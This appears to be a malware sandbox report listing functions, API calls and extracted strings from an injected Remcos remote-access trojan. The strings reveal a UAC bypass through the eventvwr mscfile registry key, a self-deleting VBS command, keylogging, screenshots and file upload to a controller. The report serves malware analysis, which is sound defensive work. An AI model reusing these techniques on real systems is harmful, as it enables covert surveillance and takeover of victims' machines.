                                        • Instruction ID: b4a4f595ba20e3ddc78d608186175dd3b8862ad4542c3cdb598845444374d78f
                                        • Opcode Fuzzy Hash: 41c979ee838667a1ab904165c7c8012ccd1c603d80f7618d3b6cca96293c13c4
                                        • Instruction Fuzzy Hash: 37316D716043089FFFA0AB38DA48B5B73E8AF04324F55C42DE499D7150EE35F9548B10
                                        Function 04A87BB6 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 04A87D1F
                                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 04A87D57
                                        • __aulldiv.LIBCMT ref: 04A87D89
                                          • Part of subcall function 04A84A81: send.WS2_32(?,00000000,00000000,00000000), ref: 04A84B16
                                          • Part of subcall function 04A994DA: GetLocalTime.KERNEL32(00000000), ref: 04A994F4
                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 04A87EAC
                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 04A87EC7
                                        • CloseHandle.KERNEL32(00000000), ref: 04A87FA0
                                        • CloseHandle.KERNEL32(00000000,00000052), ref: 04A87FEA
                                        • CloseHandle.KERNEL32(00000000), ref: 04A88038
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                        • API String ID: 3086580692-2596673759
                                        • Opcode ID: 987d5e5f4bd76b2fc2a594ffdfd2d8c48bef3cf56bfdf18ec59c75ea2df5c73f
                                        • Instruction ID: bc67ca748f5f95fdfc16e9231999bd74bdfad8689b2e2748916ea1242412e2d1
                                        • Opcode Fuzzy Hash: 987d5e5f4bd76b2fc2a594ffdfd2d8c48bef3cf56bfdf18ec59c75ea2df5c73f
                                        • Instruction Fuzzy Hash: E0B1B0716083409BE714FB64C990ABFB7E9EFD4218F504A1DF48A46290EF31AD06CB56
                                        Function 04A8DE34 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 223processsynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,04AF2248,04AF1FFC,?,00000001), ref: 04A8DE4E
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 04A8DE79
                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 04A8DE95
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 04A8DF14
                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 04A8DF23
                                          • Part of subcall function 04A99F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 04A99F9C
                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 04A8E047
                                        • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 04A8E133
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                        • API String ID: 193334293-1743721670
                                        • Opcode ID: b016539f5566d2fd19a85fd29291e8276540a535cdaa8a5f63a483ceee4c67f9
                                        • Instruction ID: 40dcf3b622e78a0b3b7da1e81b35d410d5c246344ef7d57af1b0c01ef56ebcf1
                                        • Opcode Fuzzy Hash: b016539f5566d2fd19a85fd29291e8276540a535cdaa8a5f63a483ceee4c67f9
                                        • Instruction Fuzzy Hash: 388150715093419BEB14FBA0D990DAFB7E9EFA4248F40082DE58687191EF34BD4ECB52
                                        Function 04ACD7E0 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: b91f6b7c43b4527f54a3435074a7d188840fd85cbdbfea5bcdd858e5b83b1841
                                        • Instruction ID: 1c6f2a121b97c3ceb346281b9db924adf104b73bc16504862f8f7568d49d0983
                                        • Opcode Fuzzy Hash: b91f6b7c43b4527f54a3435074a7d188840fd85cbdbfea5bcdd858e5b83b1841
                                        • Instruction Fuzzy Hash: EBC18772E44204BFEB60DBA8CD45FEE77F8AB48708F054169FA49FB281D670B9458750
                                        Function 04A91899 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 417sleepfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 04A918B2
                                          • Part of subcall function 04A99959: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,04AE9654,04A8BDCB,.vbs,?,?,?,?,?,04AF2200), ref: 04A99980
                                          • Part of subcall function 04A968A6: CloseHandle.KERNEL32(04A840D5,?,?,04A840D5,04AE2E24), ref: 04A968BC
                                          • Part of subcall function 04A968A6: CloseHandle.KERNEL32(04AE2E24,?,?,04A840D5,04AE2E24), ref: 04A968C5
                                        • Sleep.KERNEL32(0000000A,04AE2E24), ref: 04A91A01
                                        • Sleep.KERNEL32(0000000A,04AE2E24,04AE2E24), ref: 04A91AA3
                                        • Sleep.KERNEL32(0000000A,04AE2E24,04AE2E24,04AE2E24), ref: 04A91B42
                                        • DeleteFileW.KERNEL32(00000000,04AE2E24,04AE2E24,04AE2E24), ref: 04A91B9F
                                        • DeleteFileW.KERNEL32(00000000,04AE2E24,04AE2E24,04AE2E24), ref: 04A91BCF
                                        • DeleteFileW.KERNEL32(00000000,04AE2E24,04AE2E24,04AE2E24), ref: 04A91C05
                                        • Sleep.KERNEL32(000001F4,04AE2E24,04AE2E24,04AE2E24), ref: 04A91C25
                                        • Sleep.KERNEL32(00000064), ref: 04A91C63
                                          • Part of subcall function 04A84A81: send.WS2_32(?,00000000,00000000,00000000), ref: 04A84B16
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                        • String ID: /stext "
                                        • API String ID: 1223786279-3856184850
                                        • Opcode ID: 3d94059923e31c6ff1190a398cab537a6962476fd4acee07f52b7e73c56378c0
                                        • Instruction ID: b7a4c1225182c0aeaf92571f8066c227251bd031ea31a71cb93f2af28f12bb83
                                        • Opcode Fuzzy Hash: 3d94059923e31c6ff1190a398cab537a6962476fd4acee07f52b7e73c56378c0
                                        • Instruction Fuzzy Hash: 51F110315083419AE729FBA4DA90BFFB7E5EF94208F40495DE086461D1EF70BE4EC652
                                        Function 04A93606 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 65535$udp
                                        • API String ID: 0-1267037602
                                        • Opcode ID: d96b8bec8133ad84534840858c1a0b3172caf73b222da33939c307c08689efdd
                                        • Instruction ID: 8b1e538da09f589051eb7abab0de42d2d790709fca9e4006a039a157667603dc
                                        • Opcode Fuzzy Hash: d96b8bec8133ad84534840858c1a0b3172caf73b222da33939c307c08689efdd
                                        • Instruction Fuzzy Hash: 8451A1F52093019BEF20DB25D948B7B77F8EB89B40F08042DFC9296290E668FC459752
                                        Function 04A89C1F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 04A89C81
                                        • Sleep.KERNEL32(000001F4), ref: 04A89C8C
                                        • GetForegroundWindow.USER32 ref: 04A89C92
                                        • GetWindowTextLengthW.USER32(00000000), ref: 04A89C9B
                                        • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 04A89CCF
                                        • Sleep.KERNEL32(000003E8), ref: 04A89D9D
                                          • Part of subcall function 04A8962E: SetEvent.KERNEL32(?,?,00000000,04A8A156,00000000), ref: 04A8965A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                        • String ID: [${ User has been idle for $ minutes }$]
                                        • API String ID: 911427763-3954389425
                                        • Opcode ID: 05acac8f48e78d6b1edd283a1b0ee73f33a607db971a3f679b0263270a71b95a
                                        • Instruction ID: 39c0166837db24bf11a8bfb7a972887d89ac5bdc58d4d70d2b9a0433807f0c44
                                        • Opcode Fuzzy Hash: 05acac8f48e78d6b1edd283a1b0ee73f33a607db971a3f679b0263270a71b95a
                                        • Instruction Fuzzy Hash: B151BFB16042406FF704FBA4D954ABFB7A9EB94308F40091DF98697290EF78BD06C792
                                        Function 04A8C3B8 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 04A912B5: TerminateProcess.KERNEL32(00000000,04AF21E8,04A8E2B2), ref: 04A912C5
                                          • Part of subcall function 04A912B5: WaitForSingleObject.KERNEL32(000000FF), ref: 04A912D8
                                          • Part of subcall function 04A920E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,04AF2200), ref: 04A92104
                                          • Part of subcall function 04A920E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 04A9211D
                                          • Part of subcall function 04A920E8: RegCloseKey.ADVAPI32(00000000), ref: 04A92128
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 04A8C412
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,04AE9654,04AE9654,00000000), ref: 04A8C571
                                        • ExitProcess.KERNEL32 ref: 04A8C57D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                        • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                        • API String ID: 1913171305-2411266221
                                        • Opcode ID: 31622146a6ccac2823eef53dc9045a95fc93d82f8d5adf563b9be6d67c178a5e
                                        • Instruction ID: fbd59b4a74c3c2321c76af4cb191041b15bb80ed6d45afb13d66982371b90d71
                                        • Opcode Fuzzy Hash: 31622146a6ccac2823eef53dc9045a95fc93d82f8d5adf563b9be6d67c178a5e
                                        • Instruction Fuzzy Hash: E1413B729001186BEB18FBA5DD95DFE77B8EF64608F40016EE416A7191EE307E4BCA90
                                        Function 04AB85DA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,04A81D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 04AB8632
                                        • GetLastError.KERNEL32(?,?,04A81D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 04AB863F
                                        • __dosmaperr.LIBCMT ref: 04AB8646
                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,04A81D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 04AB8672
                                        • GetLastError.KERNEL32(?,?,?,04A81D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 04AB867C
                                        • __dosmaperr.LIBCMT ref: 04AB8683
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,04A81D35,?), ref: 04AB86C6
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,04A81D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 04AB86D0
                                        • __dosmaperr.LIBCMT ref: 04AB86D7
                                        • _free.LIBCMT ref: 04AB86E3
                                        • _free.LIBCMT ref: 04AB86EA
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                        • String ID:
                                        • API String ID: 2441525078-0
                                        • Opcode ID: 3008aa45d4bed9e619a34444c4d7281bb111d041dcac593cdeecabca2a672398
                                        • Instruction ID: 1b490de096007d0b850e68455287d86f113e765b12b8e0194ce1b207867e6923
                                        • Opcode Fuzzy Hash: 3008aa45d4bed9e619a34444c4d7281bb111d041dcac593cdeecabca2a672398
                                        • Instruction Fuzzy Hash: 5531AE7290120ABBEF11AFA8DC549EF3B6CEF04325F10461DF85196252EB39E911DBA0
                                        Function 04A85480 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetEvent.KERNEL32(?,?), ref: 04A8549F
                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 04A8554F
                                        • TranslateMessage.USER32(?), ref: 04A8555E
                                        • DispatchMessageA.USER32(?), ref: 04A85569
                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,04AF1F10), ref: 04A85621
                                        • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 04A85659
                                          • Part of subcall function 04A84A81: send.WS2_32(?,00000000,00000000,00000000), ref: 04A84B16
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                        • API String ID: 2956720200-749203953
                                        • Opcode ID: 2ffff7fb370cccea506a469b05591b8210aff418a43f1712627edb10babd9e78
                                        • Instruction ID: bba1e2f4240541681faece72ccd202480274777ebd56d5b55ac30cd0f648416f
                                        • Opcode Fuzzy Hash: 2ffff7fb370cccea506a469b05591b8210aff418a43f1712627edb10babd9e78
                                        • Instruction Fuzzy Hash: 0141D272A04201ABEB14FB75DA5487F7BE9EBC5614F40091DF9528B180EF34EE06CB92
                                        Function 04AC5631 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 04AC5645
                                          • Part of subcall function 04AC3C92: HeapFree.KERNEL32(00000000,00000000,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?), ref: 04AC3CA8
                                          • Part of subcall function 04AC3C92: GetLastError.KERNEL32(?,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?,?), ref: 04AC3CBA
                                        • _free.LIBCMT ref: 04AC5651
                                        • _free.LIBCMT ref: 04AC565C
                                        • _free.LIBCMT ref: 04AC5667
                                        • _free.LIBCMT ref: 04AC5672
                                        • _free.LIBCMT ref: 04AC567D
                                        • _free.LIBCMT ref: 04AC5688
                                        • _free.LIBCMT ref: 04AC5693
                                        • _free.LIBCMT ref: 04AC569E
                                        • _free.LIBCMT ref: 04AC56AC
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: ff4be1393b9998745b752512b6cb3b191e244c1ef08f8ff0e3092a516a38729c
                                        • Instruction ID: 838b9a0d0bb24aeb3067609db1196559872f401558629f7cc4d066b96338c392
                                        • Opcode Fuzzy Hash: ff4be1393b9998745b752512b6cb3b191e244c1ef08f8ff0e3092a516a38729c
                                        • Instruction Fuzzy Hash: 3511A77550420CBFDF81EF94CA44CDD3B65FF04264B02C499BA894F121EA31FA649B80
                                        Function 069163F6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                        • Instruction ID: 72540f9d3e7fa39a771508ee2c493a870cd51a4ede55867189a956feba1e954d
                                        • Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                        • Instruction Fuzzy Hash: 5011C67950014CEFCB81EF54CD44CD93FA5EF48760F2250A5BA289FA21D636EA50DB84
                                        Function 068DC636 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 296COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: $.F$6$t<F$!G$!G
                                        • API String ID: 176396367-201192458
                                        • Opcode ID: 7ee9b6793bad505f52b25d90490fb0d5f8a9afeb768bac4d3d28c008bec071fb
                                        • Instruction ID: 711221f8cf696f586f23d4d23215ef0040309f0162cc3079528fb509f4390870
                                        • Opcode Fuzzy Hash: 7ee9b6793bad505f52b25d90490fb0d5f8a9afeb768bac4d3d28c008bec071fb
                                        • Instruction Fuzzy Hash: 2E9196715083406AD3D8FB39DC60EBF73A9AF90600F50486EE666D6190EE349E09C6B7
                                        Function 0691E9CA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 204COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID: xF
                                        • API String ID: 269201875-2169143296
                                        • Opcode ID: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
                                        • Instruction ID: 4083c0018c8030c0268f2d9333adb7e1d78ac63f0f5af8baf4f33f601de7ab43
                                        • Opcode Fuzzy Hash: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
                                        • Instruction Fuzzy Hash: 5E61C275D00319AFEBA0CF69C840BAABBF4EF48720F34016AEC65EF640E77099418B54
                                        Function 04A97F6A Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 04A97F6F
                                        • GdiplusStartup.GDIPLUS(04AF1668,?,00000000), ref: 04A97FA1
                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 04A9802D
                                        • Sleep.KERNEL32(000003E8), ref: 04A980B3
                                        • GetLocalTime.KERNEL32(?), ref: 04A980BB
                                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 04A981AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                        • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                        • API String ID: 489098229-3790400642
                                        • Opcode ID: 9af79842b59eac6a70922cd77f01e667e850d2262c006942a12f34d9b108d5d4
                                        • Instruction ID: 74cd67a5319755961cb909941f609f4985b87856cccfe10009c6f72c87fa471b
                                        • Opcode Fuzzy Hash: 9af79842b59eac6a70922cd77f01e667e850d2262c006942a12f34d9b108d5d4
                                        • Instruction Fuzzy Hash: B5515F71A00258ABFF14FBB4C9549FD77A9EF55208F44005DE546AB180EF38BE46C7A0
                                        Function 04AD30E4 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,04AD41DF), ref: 04AD3107
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DecodePointer
                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                        • API String ID: 3527080286-3064271455
                                        • Opcode ID: e4b83335f49ac042eed75cb336f77818ab753833a958d46635996ff2fc59f3c3
                                        • Instruction ID: 104352c1c821f979cd545ea674c1b59970bbd2dea14ea2eb4fd0063e3725e5bf
                                        • Opcode Fuzzy Hash: e4b83335f49ac042eed75cb336f77818ab753833a958d46635996ff2fc59f3c3
                                        • Instruction Fuzzy Hash: 13515B74A0150ADBDF009FA8EA4C1EDBBB4FF19314F504185E883BB254DB35BA24CB1A
                                        Function 04A959BA Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 04A95A1A
                                          • Part of subcall function 04A9A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,04A8983B), ref: 04A9A228
                                        • Sleep.KERNEL32(00000064), ref: 04A95A46
                                        • DeleteFileW.KERNEL32(00000000), ref: 04A95A7A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CreateDeleteExecuteShellSleep
                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                        • API String ID: 1462127192-2001430897
                                        • Opcode ID: 0934749da63f11bba3240106911df6502fc197d5d0132758c3342d5286d4f966
                                        • Instruction ID: 6a501e424a828f6ae1797336edff9f58ef1e002c9782d754bd9620345884dfce
                                        • Opcode Fuzzy Hash: 0934749da63f11bba3240106911df6502fc197d5d0132758c3342d5286d4f966
                                        • Instruction Fuzzy Hash: CC3141719412196BEB08FBA0DE95DFEB768EF10208F40016DE506671D1EF607E8BCA94
                                        Function 04A866A6 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 78COMMON
                                        Download Yara Rule
                                        APIs
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,04AE9654,04AE9654,00000000), ref: 04A86775
                                        • ExitProcess.KERNEL32 ref: 04A86782
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteExitProcessShell
                                        • String ID: C:\Windows\SysWOW64\colorcpl.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                        • API String ID: 1124553745-2519146888
                                        • Opcode ID: bb5e688574bda294b79da5c603aa0c4a382411439ab368b42b6fa8e5976f57f9
                                        • Instruction ID: 50de1453b6af981c59ab707bcf6d5cf5cd6b7ed28cdbee3d03a83ffc1296c56b
                                        • Opcode Fuzzy Hash: bb5e688574bda294b79da5c603aa0c4a382411439ab368b42b6fa8e5976f57f9
                                        • Instruction Fuzzy Hash: 8E11DF72A442047BFF14B7A1DD52FFF32A8EB10A18F00045DF926AA1C0EE617D0687E2
                                        Function 04A9AA4F Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 53memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • AllocConsole.KERNEL32(00000001), ref: 04A9AA5D
                                        • ShowWindow.USER32(00000000,00000000), ref: 04A9AA76
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocConsoleShowWindow
                                        • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
                                        • API String ID: 4118500197-4025029772
                                        • Opcode ID: 4e375daa566fd7d17784c186393b21a4eea960b667f977e43ef2ce5b197acdc5
                                        • Instruction ID: 4aa8345d1668b8f9a0a70ee15d07d8099dfe6284e773b00c8271886275845ec2
                                        • Opcode Fuzzy Hash: 4e375daa566fd7d17784c186393b21a4eea960b667f977e43ef2ce5b197acdc5
                                        • Instruction Fuzzy Hash: 680161B2980318BBEB10FBF99D05EEF77ACBF04708F880459B151E7045EAA8B5094B60
                                        Function 04A9B212 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 04A9B22B
                                          • Part of subcall function 04A9B2C4: RegisterClassExA.USER32(00000030), ref: 04A9B310
                                          • Part of subcall function 04A9B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 04A9B32B
                                          • Part of subcall function 04A9B2C4: GetLastError.KERNEL32 ref: 04A9B335
                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 04A9B262
                                        • lstrcpynA.KERNEL32(04AF1AF8,Remcos,00000080), ref: 04A9B27C
                                        • Shell_NotifyIconA.SHELL32(00000000,04AF1AE0), ref: 04A9B292
                                        • TranslateMessage.USER32(?), ref: 04A9B29E
                                        • DispatchMessageA.USER32(?), ref: 04A9B2A8
                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 04A9B2B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                        • String ID: Remcos
                                        • API String ID: 1970332568-165870891
                                        • Opcode ID: f345dc0fd8bb1e1a3ec56e188abc1b02ba90bf4a7f29e66027a4d53818077131
                                        • Instruction ID: 880c9a84a126207b43b6a88af3f0c9164259463802287d489c28121a5000cac1
                                        • Opcode Fuzzy Hash: f345dc0fd8bb1e1a3ec56e188abc1b02ba90bf4a7f29e66027a4d53818077131
